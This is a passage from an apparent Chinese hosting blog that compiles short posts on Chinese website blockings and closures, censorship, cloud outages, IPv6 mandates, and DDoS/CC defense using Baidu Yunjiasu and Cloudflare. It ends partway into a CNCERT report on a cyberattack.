地址。 linux.do 是一个中文技术社区论坛,主要围绕人工智能、Linux 技术、软件开发、网络安全等话题展开讨论和交流。它由 PandoraNext 等项目的开发者创建,虽然名字里带有 “Linux”,但内容远不止 Linux 技术,而是涵盖了从 AI 前沿资讯到生活经验分享的广泛领域,被称为“几乎什么都聊”的社区。 主机帮认为被墙的主要原因可能是内容违规,或者是cloudflare节点有违规网站,导致被牵连。一但域名被墙,其实很难恢复的,前两年就被墙的全球主机论坛至今都没有恢复。 目前想要恢复正常访问,最好的办法使用国内服务器,然后备案,因为国内网络是没有GFW的。 #### 国内知名云服务商:青云QingCloud 将于 3 月 16 日上市 青云科技3月14日披露上市公告书,公司股票将于2021年3月16日在上海证券交易所上市。股票简称为青云科技。股票代码为688316。 本次公开发行的股票数量为1200万股。本次公开发行后的总股本约为4746万股。本次发行募集资金总额约7.64亿元。青云QingCloud一直都是国内排前十的云服务商,虽然个人用得比较少,但是国内很多大型项目都有参与,提供的服务都是企业级的,是一家实力比较强悍的云服务商。 #### 国内知名开发网站联合开发网因涉政违法被罚50万 面临倒闭 圈内比较知名的编程技术网站:联合开发网 - pudn.com最近踩雷了,原因是网站内的帐户发布涉政违法信息,多个帐户名称违法违规,性质恶劣,情节严重。   联合开发网是国内比较出名的网站了,主要是做编程资料分享的,注册人数高达710元,内容总数更是高达363万,数据庞大。 网站盈利肯定有的,不过这次罚款50万,确实是巨款,要知道现在网站业务其实已经是夕阳产业了,想挣50万不容易。目前该网站首页已经贴上通知书了,看站长意思是不想经营了。 这么大的网站不经营可惜,可以考虑转手他人,还是值钱的。这件事也给我们广大站长提个醒,千万要管好自己网站的内容,非法违规发现一定要及时处理,否则迟早会中招,特别是涉及政治的,一定要删! #### 国内知名海外交流服务器论坛hstloc论坛疑似被墙 一般老站长都知道,hstloc.com名为全球主机交流论坛,业内很知名,主要是交流一些海外的服务器,这个论坛最大的特点是会员注册采用邀请制,只能老用户邀请新用户,新用户自己是无法注册的,所以门槛还是相当高的。 主机吧在该论坛也有帐号,不过里面都是交流一些海外服务商的东西,所以没怎么逛。 也正因为交流海外服务器处在国内政策风险边缘,海外服务器其实是很容易搭建翻墙的,很容易触发国家防火墙拦截。 此次被墙极可能是论坛上的某个会员发布一些违规信息导致的。 目前国内基本无法访问,而海外却访问正常,说明确实是被墙了,这是继V2v2ex之后的,又一个知名站长相关社区被墙。 国内互联网目前处在前所未有的高压状态,此前阿里云就出现大批封号的行为,所以各位站长,一定要做正规内容哈。 #### 国内知名的广告平台:好耶疑似要倒闭了 据微博网友“老贾是我了”透露:著名的好耶广告平台也要倒闭了,并晒出了一张没有扣红章的通知单。 详细如下: 公司受疫情影响,业务萎缩经营困难,从2020年12月11日开始,公司停工停产,停工停产的员工在家待岗,从通知之日起30天内,薪资按照劳动合同的约定发放,从2021年1月11日期,公司按照当地最低工资给予支付,北京最低工资为2200元,上海最低工资为2480元,期间公司仍旧按原社保缴纳基数依法缴纳五险一金。 好耶广告平台主机吧很久之前就听过了,据说是一家外企业来的,从上面停工待遇就看得出来,外资企业是非常良心的。 不过该倒闭的还是会倒闭的,目前国内的互联网广告平台几乎都倒闭得差不多的了,主机吧曾经记得在站长高峰时期,几乎一天成立一个广告平台,主机吧也曾用过一个叫麒麟广告平台的,挂了几年他们家的广告,结果有一天突然用不了,后来了解到他们平台倒闭了。 之所以这么多平台相继续倒闭是因为互联网广告越来越不值钱了,获取流量越来越苦难,而那些小平台又没什么技术,吸引不了广告商,也吸引不了站长,而且那些大的流量商都基本自己搞广告平台的,慢慢的这些小广告平台自然就没办法生存了。 总之,移动互联网时代,很多以前很管用的东西,现在已经不行了,就像个人博客,有多少人关注呢? 主机吧最近浏览一些个人博客的时候,发现他们已经停更很久了,为什么呢? 因为没多少人看了,自然也放弃了,主机吧博客目前流量还可以,但是会不会某一天,网站没流量了,也就停更了呢? 值得思考…… #### 国内知名论坛软件Discuz!将关闭! 5月30日 消息:今日,Discuz!发布公告称,由于资源和人力投入问题,Discuz!关闭了 www.discuz.net 的发言权限,不过用户仍可以查阅历史资料。 Discuz!是北京康盛新创科技有限责任公司推出的一款国内知名开源论坛软件,创建于2001年6月。目前,Discuz!已拥有15年以上的应用历史和200多万网站用户案例,是全球成熟度最高、覆盖率最大的论坛软件系统之一。2010年8月23日,康盛创想与腾讯达成收购协议,成为腾讯的全资子公司。 随着移动互联网时代的来临,Discuz!逐渐不在再更新,国内论坛也逐渐没落,各大论坛相继续关闭。此次官方论坛的宣布关闭,预示着这一款知名的开源论坛软件将被腾讯抛弃,甚至不再维护,目前Discuz!的仅由康盛大客户团队与原应用中心运营团队维护,可以说基本死了! #### 国内知名链接买卖平台:阿里微微疑似倒闭 今天在卢松松博客看到消息许久没有用的阿里微微疑似倒闭了,目前官网已经无法打开。 如果是老站长应该都会知道,阿里微微算是国内比较知名的链接买卖平台了,主机吧多年前也是在A5网站上看到打广告,才接触的,在这个平台上可以实现友情链接、链接买卖,曾经非常火,人气非常好,主机吧之前也在上面卖过友情链接,十几块钱一个月,一个链接,当时还提现过100块钱。 没曾想,还是逃不过时间的洗礼,其实阿里微微倒闭已经是必然的,因为百度多年前曾经打击过友链链接买卖平台,当时是直接封杀的,这类平台直接消失在百度的搜索引擎上,百度也明确规则禁止链接买卖行为,那时链接买卖平台一落千丈,纷纷转行,一些比较出名的链接平台也纷纷关闭,其中代表就是站长之家的友情链接平台。 阿里微微备案信息属于北京正道佳业网络科技有限公司,目前通过百度爱企查来看,该公司显示经营异常。2021-04-09北京市朝阳区市场监督管理局通过登记的住所或者经营场所无法联系,可惜了。   #### 国内禁用的国外网站 国内对一些国外网站进行了屏蔽和限制,包括但不限于以下几类: 社交媒体网站:如Facebook、Twitter、Instagram、YouTube等。 谷歌相关网站:包括Google搜索、Gmail邮箱、Google地图等。 海外新闻媒体网站:如New York Times、BBC News、CNN、Reuters等。 某些应用商店和工具网站:如App Store、GitHub等。 涉及政治、性内容等敏感话题的网站:如维基百科、谷歌学术、Pornhub等。 需要注意的是,这些屏蔽和限制并不是完全一成不变的,随着政策和监管的变化,这些网站的状态也可能发生变化。此外,使用翻墙工具等方式绕过封锁访问这些网站是违法行为,可能会带来法律风险和安全风险,建议谨慎使用。 #### 国内第四大运营商中国广电成立 注册资本超千亿 10月12日 消息:今天,国内第四大运营商中国广电网络股份有限公司正式在京成立,注册资本高达 1012 亿元。 天眼查信息显示,中国广电成立于 2020 年 9 月 25 日,法定代表人为宋起柱,经营范围包括有线广播电视传输服务;广播电视节目制作;互联网信息服务;经营电信业务等。 据悉,中国广电后续将发行 192 号段的手机号码。 2019 年 6 月 6 日,工信部正式发放了5G牌照,中国广电是四家获得5G牌照的公司之一。通过与中国移动签约实现基站共建共享,中国广电的运营商业务将实现较高的起点。今后,中国广电的手机用户除了可以使用广电自建的5G基站,还将可以共享使用移动的基站。 中国广电的成立是否意味着我们固定宽带除了中国电信、中国移动、中国联通之外的第四选择呢?拭目以待吧! #### 国内网站应用要求支持IPV6了,中国移动、支付宝、百度在列 前不久,一位运营政府网站的站长因为网站不支持IPV6被通报整改,目前不仅国内政府网站要支持IPV6,国内一些重要互联网企业应用也必须要求支持IPV6。 据“网信中国”消息,中央网信办等12部门联合印发通知确认IPv6技术创新和融合应用试点名单。名单中共22个综合试点城市和96个试点项目,中国移动、支付宝、百度等19家单位分别牵头申请的“IPv6技术创新与产业发展”在列。 96个试点项目围绕“IPv6技术创新与产业发展”、“IPv6单栈部署应用”、“IPv6与5G建设应用同步实施”等7个方向。 当前,推动IPv6的规模部署已成为建设网络强国的重要国家战略。“十四五”规划和2035年远景目标纲要强调全面推进IPv6规模部署。2021年7月,中央网信办、国家发展改革委、工业和信息化部联合印发了《关于加快推进互联网协议第六版(IPv6)规模部署和应用工作的通知》。通知指出,我国IPv6发展处于攻坚克难、跨越拐点的关键阶段,到2023年末基本建成先进自主的IPv6技术、产业、设施、应用和安全体系,形成市场驱动、协同互促的良性发展格局。 IPv6技术创新和融合应用综合试点城市名单 IPv6技术创新和融合应用试点项目名单 对于个人站长来说,IPV6改造也是势在必行,当然改IPV6其实很简单,买个支持IPV6的服务器就行了,或者直接买个支持IPV6的CDN,比如百度云加速,进入CDN加速,开启IPV6就行。主机吧目前已支持IPV6。 #### 国内网站怎么防御CC攻击 CC攻击是目前国际上攻击成本最低的一种方式,往往黑客只需要一个简单的CC攻击软件就可以对一个小型网站造成严重的损失,轻的打开慢,卡,严重的会使网站服务器直接卡死。因为CC攻击成本低,所以CC攻击是目前国内最常见的攻击方式。 简单的CC攻击往往是通过多个代理IP对网站进行大量请求,从而导致服务器资源占满,引起网站卡死,这类攻击防御起来非常简单,一般的防火墙如安全狗都是可以防护的,只需要对IP访问频率进行限制即可。 但如果黑客的代理IP较多,那就很难防了,因为对方一个IP可以设置成一分钟访问一次或者几十秒请求一次,这个频率基本上和正常用户一样了,防火墙是无法进行拦截了。 有些防火墙可以通过User-Agent过滤,即过滤某些浏览器、蜘蛛请求,但这很容易误伤,而且很多攻击都是使用正常浏览器请求的,所以并不能有效解决CC攻击问题。 那么如何有效解决CC攻击呢? 主机吧这里推荐使用百度云加速高防CDN进行防护,百度云加速不仅可以有效防护DDoS攻击,同时对CC攻击防护也是非常有效果。百度云加速提供四到七层的DDoS攻击防护,包括CC、SYN flood、UDP flood等所有DDoS攻击方式, 通过分布式高性能防火墙+精准流量清洗+CC防御+WEB攻击拦截,组合过滤精确识别,有效防御各种类型攻击。   接入百度云加速后即可使用以下功能进行防护拦截。 WAF篇 WAF(Web Application Firewall)网站应用防火墙,简单点讲,就是保护您网站避免被入侵的一套防火墙系统。云加速的防火墙规则由国内顶尖的云加速安全团队制定,能防御市面上超过99%常见的SQL注入、XSS、Web服务器漏洞、应用程序漏洞以及文件访问控制等等系列的渗透攻击,有效的避免您的网站遭到入侵。 下面为WAF选择展开后的功能界面: Web应用防火墙开关 关闭后WAF功能将失效。 高级定制 点开后会发现整个WAF规则划分成了一个个模块,网站有特殊功能的用户可以自行选择使用哪些模块。 凡是出现验证码页面的拦截是基础规则拦截,基础规则在关闭WAF功能开关后依然是有效的,只能通过加IP白名单的方式解决。 安全验证有效期 很多功能都存在安全验证,在最终用户完成安全验证后的多久以内我们认为是安全的?这里需要配置有效期,如下图,多个时间可以选择: 浏览器检查 存在非浏览器请求方式的小伙伴请注意了,如果您网站有非浏览器请求,请关闭该功能。 访问出现浏览器检查的5秒页面,是因为您开启了ADS中CC防护的强力防护级别,在这个级别会对每一次请求进行识别,如果您不需要功能,请将CC防护调整到其他级别即可。 邮件地址混淆 开启该功能后,在您网页上所留的邮箱可以避免被爬虫扫描识别。 防盗链 开启后,您网站上的图片资源被盗链后,引用位置会出现403的显示。开启防盗链功能后,如果有部分网站是您许可链接的,那么白名单中添加域名即可。 通过以上的介绍,您现在也许已经了解云加速的全部WAF功能了。   IP防火墙篇 自定义IP防护策略,个性化安全服务。通过添加IP黑名单、IP白名单、强力防护名单,您可以对来自特定IP或IP段的请求进行拦截、放行或强力防护,从而实现IP级别的防护策略。 IP防火墙如下图,具有以下几个功能和特点 IP黑名单 可以禁止哪些IP来访问您的网站,目前支持B段和C段的IP防护,且支持输入0/24、0/16 进行网段屏蔽,被屏蔽后的用户访问会报1006-1008错误,如下图。 IP白名单 有两种情况需要添加白名单,第一种是部分用户会通过云加速对网站进行页面修改等高风险操作时,会被云加速给阻断。当您在确认用户操作是合法的情况下,请将他的IP地址加入到IP白名单进行放行; 第二种是用户出口IP在互联网上有太多的不良记录,用户的IP如果匹配上了黑名单,那么会弹出验证码框,来确认他是否是恶意扫描以及攻击,如果您认为用户IP是一个正常的访问,也需要加白名单。 下面图列分别是操作拦截以及黑名单拦截: 强力防护名单 有一些IP无论从访问频率还是行为都比较可以,但是您又担心误伤,这个功能就是为了解决上述问题而设计的,您可以输入IP或者是网段,只针对您输入的这部分进行强力防护。 严格意义来讲这个功能主要是ADS在发挥作用,但是为了用户更直观的操作,我们将他固定到了这里。   ADS篇 ADS 高级攻击防御提供了四到七层的DDoS攻击防护,包括CC、SYN flood、UDP flood等所有DDoS攻击方式, 通过分布式高性能防火墙+精准流量清洗+CC防御+WEB攻击拦截,组合过滤精确识别,有效防御各种类型攻击。   基础防护 DDoS防护 为域名提供四层的流量攻击防护,具体防护量级和域名的套餐类型相关。目前该功能无法关闭,因为攻击后的系统策略加载需要靠他来完成。 CC防护 在CC防护上,我们主要是以常驻规则和实时动态规则来进行防御,分为了强力、高、中、低四个等级。 强力防护:建议仅在正在受到CC攻击且防御不佳时开启 高:系统会对所有2周内产生可疑行为的用户进行选择性拦截 中:系统会智能识别出可疑请求,并且自动选择合适的认证方式(推荐) 低:系统会对本次攻击中产生可疑行为的用户进行拦截 如果在高级别时用户服务器已经超负荷,建议拉到强力模式。强力防护这个等级,会对每一次的访问进行验证,验证有效期由WAF规则中的“安全验证有效期”来进行控制。 整个ADS操作很简单,对于高端用户,建议配合自定义规则来使用。   高级防护 除了基础防护外,云加速还为国内用户提供了更多的高级防护。 停用海外节点 停止对该域名分配海外服务节点 超级清洗中心 使用企业级云清洗中心服务,更快更稳定,在被攻击情况下开启 海外IP防护 一键开启或停止对海外IP的访问启用防护策略 设置IP访问频率 设置单个IP的访问频率,超出限制后需通过验证才能继续访问 源站保护 设置访问源站频率的阈值,超出后站点全部流量需要通过验证后才能继续访问 URL黑名单 系统将对已添加的url的访问启用验证   #### 国内网站谨慎使用Cloudflare,容易被DNS污染 最近,主机吧有位客户网站被攻击后使用了Cloudflare后,一周左右网站就被污染了,其实前年的时候主机吧的一位客户也遇到这类问题。 Cloudflare作为全球最大的安全CDN服务商,其功能非常强大,但是国外使用的人多,导致接入的网站很多对于国内是违法违规的,而你的站一但跟那些违法违规内容存放在一个节点上,很容易被污染。 国内一些黑客勒索组织就是利用这点进行污染攻击,一但域名被污染,基本上是申诉无门的,所以如果你的网站正规的,而且受众是国内用户的,不建议使用Cloudflare。 其实Cloudflare在国内有合作商,京东云星盾就是Cloudflare的国内合作伙伴,跟Cloudflare同系统,而且节点是国内的,建议如果需要防御的可以使用京东云星盾。 优惠地址:https://zhujib.com/jdxingdun.html #### 国内网络内容审查已经到了变态的程度了 今早,收到百度客户的反馈,客户网站内容需要整改,主机吧看了,连泳装照都算违规。 spa和泳装图片都这不了审,也就是女的稍微露点的照片都是无法使用百度智能云CDN的,这很离谱。 #### 国内著名云服务商UCloud 故障了 凌晨1点29分收到一封邮件: UCloud关于4月3日北京二地域部分外网虚拟网关异常的说明 4月3日00:53,UCloud 北京二地域外网虚拟网关(UVER)某集群发生转发异常,经工程师团队紧急处理,系统于02:11恢复。 本次故障发生的原因是,在外网虚拟网关(UVER)的灰度集群部署过程中,灰度集群的配置文件,被错误推送到某个业务集群上,预定的回滚措施没能正常运行,导致转发异常。 针对上述情况,我们将加强发布验证流程的自动化,优化设计灰度集群和业务集群,保证控制面和转发面完全隔离,使客户系统正常运行。 非常抱歉给您带来的影响!如有任何问题,您可通过电话或工单系统随时反馈。针对本次故障,我们将按照SLA协议,尽快采取补偿事宜。 2019年4月3日 优刻得科技股份有限公司   因此这次故障,2017 年 UCloud 损失 651.90 万元。 2016 年损失 58.61 万元,2018 年损失 114.49 万元。从这些数字上可以看出,UCloud 对用户是极其负责任的。 UCloud是中立的云计算服务提供商,专注于基础架构服务,永不涉足内容业务。不像阿里腾讯很多业务都是跟客户竞争对手关系,因此UCloud非常受一些创业公司欢迎,国内云市场份额也非常不错。 #### 国内首个类似ChatGPT产品发布了,名为 MOSS与《流浪地球》AI 同名 2 月 20 日消息,自从 ChatGPT 爆火以来,各大科技公司都争相推出了相关竞品。而国内方面,复旦大学抢先一步,已推出国内第一个对话式大型语言模型 MOSS。 MOSS 来自复旦大学自然语言处理实验室的邱锡鹏教授团队,名字与《流浪地球》电影中的 AI 同名,已发布至公开平台(https://moss.fastnlp.top/),邀请公众参与内测。 MOSS 可执行对话生成、编程、事实问答等一系列任务,打通了让生成式语言模型理解人类意图并具有对话能力的全部技术路径,将于后期进行开源。 不过邱锡鹏教授坦言,MOSS 的参数量比 ChatGPT 小一个数量级,在任务完成度和知识储备量上,还有很大提升空间。 主机吧试着打开官网看了下,目前网页只有一张图,不知道什么情况。 #### 国内首例云服务器侵权案 阿里云不承担法律责任 6月21日 消息:2017 年,阿里云因给从事游戏私服外挂运营的不法分子提供服务器,一审被法院认定构成侵权并判决赔偿原告乐动卓越公司 26 万元。 历时两年时间,近日,首例云服务器知识产权侵权案件二审改判,北京知识产权法院驳回一审原告的所有诉讼请求,阿里云公司不承担法律责任。 关于本案双方围绕的争议,北京知产法院从本案的法律适用、合格通知的判断标准、云服务器提供者应当采取何种必要措施、阿里云公司是否构成共同侵权及应否承担民事责任等方面做出全面回应。 关于本案的法律适用,法院认为,云服务器租赁不属于《信息网络传播权保护条例》规定的具体网络技术服务类型,因此不适用该条例,而应当适用《侵权责任法》第三十六条第二款和第三款。 关于合格通知的判断标准问题,法院认为,“权利人发出的通知不满足法律规定的合格通知要件即为不合格通知,不应对网络服务提供者苛以进一步联系、核实、调查等责任。”“如果容忍通知缺少法律规定的要件,并要求网络服务提供者进一步联系、核实、调查,无疑使得法律对通知合格要件的规定落空……在《侵权责任法》对前述问题没有规定的情况下,上述要求必然使得网络服务提供者面临责任承担的不确定性。” 关于云服务器应当采取何种必要措施的问题,法院认为,根据阿里云公司提供的涉案云服务器租赁服务的性质,简单将“删除、屏蔽或者断开链接”作为阿里云公司应采取的必要措施和免责事由,与行业实际情况不符。鉴于信息服务业务类型不同,以及权利人主张权利内容不同,阿里云公司仅根据权利人通知即采取后果最严厉的“关停服务器”或“强行删除服务器内全部数据”措施有可能给云计算行业乃至整个互联网行业带来严重的影响,并不适当,不符合审慎、合理之原则。在不适合直接采取删除措施的情况下,转通知体现了网络服务提供者“警示”侵权人的意图,从而在一定程度上有利于防止损害后果扩大,可以成为“必要措施”从而使得网络服务提供者达到免责条件。 关于阿里云公司是否构成共同侵权及应否承担民事责任,乐动卓越公司向阿里云公司发出的通知不符合法律规定,属于无效通知,阿里云公司在接到通知后未采取必要措施未违反法律规定。因此,法院认为,阿里云公司就其出租的云服务器中存储侵权软件的行为,在本案中不应承担侵权责任。 法院也认为,从我国云计算行业的发展阶段来看,若对云计算服务提供者在侵权领域的必要措施和免责条件的要求过于苛刻,势必会激励其将大量资源投入法律风险的防范,增加运营成本,给行业发展带来巨大的负面影响。动辄要求云计算服务提供者删除用户数据或关闭服务器,也会严重影响用户对其正常经营和数据安全的信心,影响行业整体发展。 作为国内首例涉及云服务器责任认定的侵权案,该案曾引起云服务行业和法律界的广泛关注与争论。 #### 国外免费好用的网站测速工具 做英文网站的,网站一般对国外用户访问,全球各地的访问速度极为重要,所以一般我们需要用到一些网站测速工具来了解网站在全球各地的速度表现。 今天主机吧就来介绍下国外有哪些好用且免费的测速工具。 1. Pingdom Website Speed Test Pingdom是一个免费的网站速度测试工作,不仅是看起来非常棒,而且尽可能多的呈现出你的网站的各方面信息。它可测试网站加载速度,对页面和大小进行分析。测试完成后会得到一份非常详细的测试报告,包括图片、CSS等,帮助用户找出影响网站速度的原因,并给出改善网页性能的可行性方案,对于有网站的用户来说非常实用。工具地址:https://tools.pingdom.com/ 2.Webpagetes Webpagetest原本是由AOL开发内部使用的工具,后来在Google Code上开源,是一款非常优秀的网页前端性能测试工具。不仅可以测试个个国家访问特定网站的加载时间,还可以测试不同的浏览器以及不同手机系统(IOS/Android)所花费的时间。工具地址:http://www.webpagetest.org/ 3.PageSpeed Insigts 这是Google一款测速工具,用起来很方便。它有中文页面,结果会直接总结出测试的网站所存在的问题,还有优化的建议,指示很清晰。PageSpeed的分析基于浏览器缓存、服务器响应时间、图片等。 工具地址:https://pagespeed.web.dev/ 4.Sucuri Load Time Tester 这款工具也非常好用,可以很值得直观地看出测试网站在不同国家的运行速度。它会根据网速的快慢用不同的颜色表示,绿色表示畅通,没有颜色的普通数字表示一般,黄色表示中等偏慢,红色表示缓慢。值得注意的是,因为不同网站挂靠不同地区的服务器,不可能在每个国家都能打开。但下图的网站做得不错,得分都A。 工具地址:https://performance.sucuri.net/ #### 国外免费的DDoS攻击防御的方法 经常有站长咨询主机吧:没有备案的域名可以用百度云加速吗? 回答是:不可以的。 那么没有备案的网站要如何防护DDOS/CC攻击呢?如果你的要求不高的话,可以用海外的高防CDN:cloudflare cloudflare 是一家国外的 CDN 加速服务商,比较有名气的,提供免费和付费的加速和网站保护服务,国外很多知名网站都是用cloudflare的防御服务。百度云加速的国外节点就是和 cloudflare 合作使用的 cloudflare 的节点。 cloudflare 提供了不同类型的套餐,即使是免费用户,cloudflare 提供的功能也是很全面的。 对于访客来自于国外的网站很不错;对于访客来自于国内的网站加速效果有限,有些甚至会变慢,不过其安全防护功能也很不错。 添加网站 官网: www.cloudflare.com 使用邮箱注册,注册完后自动进入添加网站界面。添加网站分为四步:添加网站域名、添加DNS记录、选择方案、更新域名服务器。 1.添加网站 填入自己的主域名(不带 www 的),“Scan DNS Records”。 2.添加DNS记录 添加完成后会自动扫描 DNS 记录,等待完成,“Continue”。 下面会列出所有扫描到的 DNS 记录。黄色云朵表示该解析通过 CDN 访问,灰色云朵表示不通过 CDN 访问,点击云朵可以切换状态。这里如果选择不走 CDN 的话,相当于只使用 cloudflare 的 DNS 功能。 这里建议全部调为黄色云朵走 CDN 访问,隐藏网站真实 IP 地址。全站通过 CDN 访问可以有效防止网站真实IP泄漏,保护原站安全。 记录简单的话可以直接按默认条目;如果没有扫描出来原记录或要手动添加,建议至少添加 @ 和 www 两条指向原网站 IP 的 A 记录,TTL 默认。 3.选择方案 选择适合自己的方案,一般小网站免费方案就够了。当然,有更高需求的可按需选择付费方案,付费的功能比较多,大家自己下了,如果不懂英文的可以用谷歌浏览器访问然后进行翻译。 4.更新域名服务器 右侧是新的域名服务器。进入域名管理面板,更改域名服务器为新的。 域名服务器更改成功后会收到邮件提示。“Continue”,完成。 Tips DNS 刷新生效需要时间,可耐心等待。 刷新本地 DNS cmd 运行 ipconfig /flushdns 查看域名服务器 cmd 运行 nslookup —> 回车 —> set type=ns —> 回车 —> 域名 等生效后,再 ping 自己的域名,显示出来的就应该是 cloudflare 节点的 IP 地址了。 cloudflare 主要是用来防御DDOS攻击的,对于国外访问也有加速作用,不过对国内的话可能会变成减速,毕竟节点都是海外的,不像百度云加速既有国内节点也有海外节点。 对于CC攻击的话默认情况下cloudflare的防御效果并不理想,需要调整为被攻击模式才会有效果,不过会出现一个类似于百度云加速5秒安全检测的页面,而且还是英文的比较影响用户体验,不过据说收费版的是可以自己修改5秒检测页面的,主机吧没试过,毕竟每月几百美元还是挺贵的。 #### 国外团队抄袭中国国产AI大模型被发现直接删库跑路了 事情是这样的,近日,斯坦福AI团队被曝出了抄袭事件,而且抄袭的还是中国国产的大模型成果,模型结构和代码,几乎一模一样。 斯坦福的Llama3-V项目在5月29日发布,宣称仅需500美元就能训练出一个性能超越GPT-4V、Gemini Ultra、Claude Opus等的多模态大模型。 Llama3-V 的 3 位作者或许是拥有名校头衔加持,又有特斯拉、SpaceX 的大厂相关背景,这个项目短短几天就受到了不小的关注。 然而,一位网友发现,Llama3-V的模型结构和代码与出自清华系明星创业公司面壁智能的MiniCPM-Llama3-V 2.5几乎一模一样,只是变量名有所变化。 面对抄袭的指控,斯坦福团队选择了删库跑路,目前在GitHub和HuggingFace上的相关项目均显示404,无法访问。 面壁智能的MiniCPM-Llama3-V 2.5项目具有独特的功能,如识别清华简一种罕见的中国古代文字。 Llama3-V在未公开的实验性特征上与MiniCPM-Llama3-V 2.5表现出高度相似的行为,这些特征是根据MiniCPM-Llama3-V 2.5团队内部数据训练的。 面对抄袭的质疑,斯坦福团队最初辩称,他们的工作早于面壁智能的MiniCPM,只是使用了他们的tokenizer。 然而,随后他们在Medium上的声明被删除,且最新的回应也被撤回。 面壁智能CEO李大海对此事件做出了正式回应,要求Llama3-V作者对这个问题给出一个正式的解释,目前,此事仍在持续发酵中。 #### 国外多个热门盗版网站集体关停 打击盗版已成为全球主流 8 月 29 日消息,近期,多个每天被数百万用户用来观看电影、电视剧和动漫的热门盗版网站突然宣布关闭。并且网站所有者似乎转变了态度,开始鼓励用户为内容付费。 图源 Pixabay Fboxz.to、Aniwave.to、Anix.to、AnimeSuge 和 Zoroxtv 等知名盗版网站已陆续关闭。这紧随全球最受欢迎的盗版流媒体网站 Fmovies 在 6 月中旬关闭的脚步,Fmovies 每年拥有超过 10 亿访问量。 令人费解的是,几乎所有关闭的网站都鼓励用户为电影付费,通过合法途径观看内容,而这些网站此前一直以免费提供付费电影等内容而闻名。 这些网站关闭的原因尚不清楚,一个可能的解释是内容所有者可能采取了法律手段。此外,市场上还存在专门打击盗版网站和内容的服务商。TorrentFreak 则指出,创意与娱乐联盟 (ACE) 和美国电影协会 (MPA) 可能是幕后推手,据报道这两家机构一直在和越南政府进行交涉,因为许多此类盗版网站都位于越南。 #### 国外知名的DDOS防御服务商 以下是一些全球知名的DDOS防御平台: Cloudflare:Cloudflare是一家全球领先的互联网安全公司,提供基于云的DDOS防御服务,以及其他安全功能,如Web应用程序防火墙和边缘计算。 Akamai:Akamai是一家全球性的内容传递网络(CDN)提供商,提供基于云的DDOS防御服务,同时还提供网络性能优化、内容交付和安全解决方案。 Arbor Networks:Arbor Networks是一家网络安全公司,其核心业务是提供DDOS攻击检测和缓解解决方案。 Radware:Radware是一家专注于网络安全和应用程序交付解决方案的公司,其DDOS防御解决方案包括云和硬件设备。 Neustar:Neustar是一家网络安全和技术服务提供商,提供云和硬件设备的DDOS防御服务,以及其他安全服务,如网络流量管理和域名解析。 F5 Networks:F5 Networks是一家专注于应用程序交付和安全的公司,提供硬件和软件的DDOS防御解决方案,以及其他网络安全解决方案,如Web应用程序防火墙和SSL VPN。 Imperva:Imperva是一家网络安全公司,提供DDOS防御解决方案、Web应用程序防火墙和数据库安全解决方案等。 #### 国外知名黑客小组Fail0verflow称获PS5密匙:索尼新主机或被破解 国外知名黑客小组Fail0verflow今日在推特上宣布他们获得了所有的PS5密钥。这些都可以从软件中获得包括每个控制台的密钥。并公布了疑似被破解的PS5固件文件。 Fail0verflow上次发推还是去年2月,时隔近两年,他们又卷土重来。 对于这个黑客小组,大家应该不会陌生,2015年最后一天,宣布成功破解PS4游戏主机,2018年2月宣布破解了Switch等等。 这次发推表明他们有一些黑客可以访问PS5的高度安全文件地址,以便提取他们测试设备的解密密钥。黑客行为很可能会涉及一些重大的硬件上的问题,但是具体怎么样,还要等待上述小组继续公布详情。 不过有业内人士透露,Fail0verflow可能完全控制了PS5,通过内核漏洞或者可能是比这更严重的问题。 #### 国外网站如何进行DDoS防御? 如果说哪里的网站最容易被攻击,那肯定是海外的网站了,国内站长把网站放在国外的,一般都是由于多种原因,如版权问题、灰产之类的。 而由于国外互联网相对自由,所以网站是很容易被攻击的,为什么被攻击?一般都是黑客想勒索,主机吧的几个客户就遇到这种情况,黑客都要求交钱,而且价格还不低,都是56千一个。 遇到这种情况,很多站长会选择交钱了事,主机吧这里提醒下各位站长,千万别交,因为真的没完没了,我一个客户交了钱后,过几天那黑客就会换一个身份又来攻击你,我客户就是因为被两波攻击然后才联系上我防御的,这种黑客攻击是没完没了的,最好的方法就是防御,让客户攻击不了你,他自然就会去找别人,攻击一两次没成功,他们自然也会放弃了,毕竟攻击是要成本的。其实防御DDOS攻击没你们想得这么难,只要钱到位,基本上大部份攻击都是可以防御的,今天我们就来教大家遇到攻击是要如何防御。 1.高防CDN 这种方式主机吧认为是最省钱的,不需要换源服务器,只需要给源服务器换个IP,然后用高防CDN隐藏起来就行了,比如用百度云加速海外版,不限DDOS防御,CC防御效果也不错,主机吧就曾用百度云加速海外版为一客户成功防御了160G峰值DDOS和11亿次的CC攻击,可以说是效果非常好的。详细可以看<记成功利用百度云加速海外版防御11亿次变异CC攻击>,而且百度云加速海外版的价格是非常便宜的,最便宜的880元一年,简直白菜价!不过百度云加速有一点不好,就是CC防御得开启5秒盾,会对首次IP访问有一个5秒的检测页面跳转,这对于APP是不行的,如果你只是网站的话,倒是没什么问题。 2.高防服务器 高防服务器是利用机房的硬防+软防进行防御,购买服务器的时候都会有一个防御DDOS峰值,比如阿里云国内服务器就免费送5G的DDoS防御,但海外都是不提供的,所以很脆。相对于国内防御来说,海外的高防服务器价格比较贵,而且防御也小。有些高防服务器甚至不提供CC防御,所以大家在购买高防服务器的时候一定要先问清楚防不防CC。 3. 高防IP 这种是比较专业的,不仅可以防DDOS也可以防CC,适用于网站、游戏、APP等业务,但价格也是很贵的,主机吧这边卖的100G香港高防IP一个月也要7800元,当然效果也是非常好的,很多客户用了都说好。高防IP是平时不启用拦截,等有攻击的时候会自动识别攻击并开启防御模式,所以误杀比较少,不像高防服务器,很多时候自义的规则都是死规则,所以也是三种防御方法中,最贵的。 好了,以上就是主机吧对国外网站防御DDoS攻击的一些方法,也是最有效的,有些站长认为用一些如安全狗之类的软件就可以防,那是没用的,主机吧可以负责任的说,软防根本防不了DDoS攻击,只会浪费时间而以,如果你有不懂的,都可以来咨询主机吧。 #### 国家互联网应急中心发布美网络攻击我国某先进材料设计研究院事件调查报告 1 月 17 日消息,国家互联网应急中心刚刚发布了《美网络攻击我国某先进材料设计研究院事件调查报告》,附原文如下: 2024 年 12 月 18 日,国家互联网应急中心 CNCERT 发布公告,发现处置两起美对我大型科技企业机构网络攻击事件。本报告将公布对其中我国某先进材料设计研究院的网络攻击详情,为全球相关国家、单位有效发现和防范美网络攻击行为提供借鉴。 一、网络攻击流程 (一)利用漏洞进行攻击入侵 2024 年 8 月 19 日,攻击者利用该单位电子文件系统注入漏洞入侵该系统,并窃取了该系统管理员账号 / 密码信息。2024 年 8 月 21 